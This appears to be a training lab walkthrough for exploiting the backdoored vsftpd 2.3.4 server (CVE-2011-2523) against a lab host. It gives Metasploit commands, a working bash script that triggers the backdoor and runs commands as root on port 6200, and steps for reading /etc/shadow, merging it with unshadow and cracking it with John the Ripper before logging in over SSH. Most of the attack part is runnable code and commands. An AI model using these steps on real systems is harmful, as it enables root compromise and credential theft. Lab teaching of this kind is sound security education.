Lesson 4 Lab Notes

In this lab we will do the following:
What is VSFTPD?

vsftpd, which stands for "Very Secure FTP Daemon", is an FTP server for Unix-like systems, including Linux.

CVE Information:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2523

In July 2011 it was discovered that the vsftpd 2.3.4 tarball downloadable from the master site had been compromised. Any client that logs in to a backdoored vsftpd 2.3.4 server with a username containing the smiley ":)" causes the daemon to open a command shell, running as root, that listens on TCP port 6200. This was not a security hole in vsftpd itself: someone had uploaded a modified tarball that contained a backdoor. Since then, the download site has been moved to Google App Engine.

Module Information:

Rapid7's module database shows which Metasploit module to use: https://www.rapid7.com/db/modules/exploit/unix/ftp/vsftpd_234_backdoor#

And exploit-db shows the module's source code: https://www.exploit-db.com/exploits/17491/

Instructions:
search vsftpd
use exploit/unix/ftp/vsftpd_234_backdoor
show options
set RHOST 172.16.56.2
exploit -j
sessions -l
sessions -i 1
whoami
hostname
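The same trigger done by hand, as an added example that is not the page's own material and not the Metasploit module's code: plain bash with its /dev/tcp redirection, so no nc is needed. The lab address 172.16.56.2 is the one used on this page; the usernames sent are arbitrary, and the `timeout` guard assumes coreutils is installed.

```bash
#!/bin/bash
# Added example (not the page's or the Metasploit module's code): arm the
# vsftpd 2.3.4 backdoor by hand with bash's /dev/tcp redirection.
# Usage: ./vsftpd_check.sh 172.16.56.2   (lab address from the page, an assumption here)

# The trigger string: any USER value containing ":)" arms the backdoor.
# The PASS value is irrelevant, the login never has to succeed.
ftp_trigger() {
    printf 'USER %s:)\r\nPASS %s\r\n' "$1" "$2"
}

# True if an FTP banner advertises the backdoored release, e.g. "220 (vsFTPd 2.3.4)".
is_vsftpd_234() {
    case "$1" in
        *"vsFTPd 2.3.4"*) return 0 ;;
        *)                return 1 ;;
    esac
}

# Talk to port 21: read the banner, send the trigger, then drop the connection.
# Once armed, the backdoored daemon keeps listening on TCP 6200.
send_trigger() {
    local host=$1 banner
    exec 3<>"/dev/tcp/$host/21" || return 1
    IFS= read -r -t 5 banner <&3 || true
    banner=${banner%$'\r'}                # FTP lines end in CRLF; drop the CR
    ftp_trigger "lab$RANDOM" "pw$RANDOM" >&3
    sleep 2
    exec 3>&- 3<&-
    printf '%s\n' "$banner"
}

# Connect to the listener and run one command. The appended "; exit" makes the
# remote /bin/sh close the socket so cat terminates; timeout is a safety net.
# Returns 1 if port 6200 is not open (backdoor not armed, or not this build).
backdoor_cmd() {
    local host=$1 cmd=$2
    exec 4<>"/dev/tcp/$host/6200" || return 1
    printf '%s; exit\n' "$cmd" >&4
    timeout 5 cat <&4
    exec 4>&- 4<&-
}

if [ $# -ge 1 ]; then
    target=$1
    banner=$(send_trigger "$target") || { echo "port 21 unreachable on $target" >&2; exit 1; }
    echo "banner: $banner"
    is_vsftpd_234 "$banner" || echo "warning: banner is not vsFTPd 2.3.4, the trigger may do nothing" >&2
    backdoor_cmd "$target" 'id; hostname' || { echo "port 6200 not open: backdoor not armed" >&2; exit 1; }
fi
```

If port 6200 answers, the remote shell is the same one Metasploit hands you as a session; `id` should come back as root on the lab target, which is why the hash-dumping steps that follow work from that shell at all.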

Grab the hash!

Type CTRL+Z to background your current shell session

CTRL+Z
search hashdump
use post/linux/gather/hashdump
show options
set SESSION 2
exploit

This should work but it does not. If you can tell me why this part of the exploit fails I will give you crewhu. Anyway, we can still dump the hashes manually. Follow these steps.

sessions -i 1
cat /etc/passwd (this is where the user accounts are located)

Copy the output, open a new terminal and paste it into a text file:

gedit passwd.txt

Switch back to our shell session.

cat /etc/shadow (this is where the password hashes are located)

Every entry whose second field starts with $1$ is an MD5-crypt hash: the characters between the next two dollar signs are the salt, and the 22 characters after that are the hashed password (accounts showing * or ! in that field have no password to crack). Copy the output, open a new terminal and paste it into a second text file, shadow.txt.

Now that the user accounts are in one file and the password hashes in another, combine them with unshadow, which puts each user's hash into the password field of its passwd line:

unshadow passwd.txt shadow.txt > unshadow.txt

If we cat unshadow.txt we will see that the two files have been merged:

cat unshadow.txt

With the accounts and hashes combined into one file, let's use John the Ripper to crack the hashes for us. DO NOT USE HYDRA, IT CAN CRASH YOUR VM!

john unshadow.txt
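What unshadow does, and how to read the $1$salt$hash field, shown as an added example rather than anything from the page: the passwd and shadow samples below are constructed in Metasploitable-style format with fake hashes, and `unshadow_manual` reproduces the merge with awk so you can see exactly what john is given.

```sh
#!/bin/sh
# Added example (not from the page): a by-hand unshadow plus a breakdown of the
# $id$salt$hash fields. Both samples are constructed; the hashes are not real.
SAMPLE_PASSWD='root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
msfadmin:x:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bash'

SAMPLE_SHADOW='root:$1$abcdefgh$0123456789abcdefghijkl:14684:0:99999:7:::
daemon:*:14684:0:99999:7:::
msfadmin:$1$ijklmnop$ABCDEFGHIJKLMNOPQRSTUV:14684:0:99999:7:::'

# Name the crypt(3) scheme from the $id$ prefix of the shadow password field.
# "$1$" is md5crypt, the "Md5 plus salt" the lab notes refer to.
hash_type() {
    case "$1" in
        '$1$'*)      echo md5crypt ;;
        '$5$'*)      echo sha256crypt ;;
        '$6$'*)      echo sha512crypt ;;
        '$y$'*)      echo yescrypt ;;
        ''|'*'|'!'*) echo locked ;;      # no password or login disabled: nothing to crack
        *)           echo unknown ;;
    esac
}

# The salt sits between the second and third '$'; the 22-char digest follows it.
hash_salt()   { printf '%s\n' "$1" | cut -d'$' -f3; }
hash_digest() { printf '%s\n' "$1" | cut -d'$' -f4; }

# unshadow by hand: for each passwd line, replace the 'x' placeholder in field 2
# with the hash that shadow holds for the same username.
# $1 = passwd text, $2 = shadow text; output is what unshadow(8) would print.
unshadow_manual() {
    pwf=$(mktemp) && shf=$(mktemp) || return 1
    printf '%s\n' "$1" > "$pwf"
    printf '%s\n' "$2" > "$shf"
    awk -F: -v OFS=: '
        NR == FNR    { hash[$1] = $2; next }   # first file (shadow): remember hash per user
        ($1 in hash) { $2 = hash[$1]; print }  # second file (passwd): splice the hash in
    ' "$shf" "$pwf"
    rm -f "$pwf" "$shf"
}

# Keep only lines john can work on: a real $id$... hash, not '*' or '!'.
crackable_only() {
    unshadow_manual "$1" "$2" | awk -F: '$2 ~ /^\$/'
}

# Stand-alone run: show the merged lines, then how each shadow entry breaks down.
echo "== unshadow output =="
unshadow_manual "$SAMPLE_PASSWD" "$SAMPLE_SHADOW"
echo "== per-account breakdown =="
printf '%s\n' "$SAMPLE_SHADOW" | while IFS=: read -r user hash rest; do
    t=$(hash_type "$hash")
    if [ "$t" = locked ]; then
        printf '%-10s locked, john will skip it\n' "$user"
    else
        printf '%-10s %s salt=%s digest=%s\n' "$user" "$t" "$(hash_salt "$hash")" "$(hash_digest "$hash")"
    fi
done
# On the real merged file the next step is simply:  john unshadow.txt
```

Knowing the format also explains why `john unshadow.txt` needs no flags: john recognises the $1$ prefix and picks md5crypt on its own. Lines whose password field is * or ! carry no hash, so they are dead weight in the file and `crackable_only` drops them.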

John prints each password it cracks next to its username. The msfadmin account has root privileges via sudo, so we can use those credentials to SSH into the server.

ssh -l msfadmin 172.16.56.2
msfadmin

Now we have terminal access via SSH! The backdoor shell we got first is as good as gold, but it is a raw, non-interactive /bin/sh with no TTY. An SSH login gives a proper terminal on the victim, so interactive programs and job control work, and the rest of SSH's features (scp, port forwarding) come along natively.
